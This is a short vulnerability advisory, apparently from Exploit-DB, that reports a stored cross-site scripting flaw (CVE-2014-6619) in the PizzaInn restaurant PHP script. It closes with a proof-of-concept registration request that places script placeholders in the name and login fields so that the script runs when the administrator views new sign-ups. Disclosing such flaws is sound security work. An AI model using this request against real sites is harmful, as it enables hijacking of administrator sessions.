Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting

EDB-ID:

34760




Platform:

PHP

Date:

2014-09-24


Title:     Pizza Inn Registration Stored XSS
Severity:   High
CVE-ID:   CVE-2014-6619
Release Date:  20 September 2014 
Author:   Kenneth F. Belva
Websites:  http://silverbackventuresllc.com
    http://xssWarrior.com 
    http://securitymaverick.com
Twitter:   @infosecmaverick
Contact:  Please use website contact form.
Mail: 
URL:     http://sourceforge.net/projects/restaurantmis/
Vendor: 
Remote Exploit:  Yes

Discovered with: xssWarrior - http://xssWarrior.com


Description:
============

On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.


Proof of Concept :
==================

http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register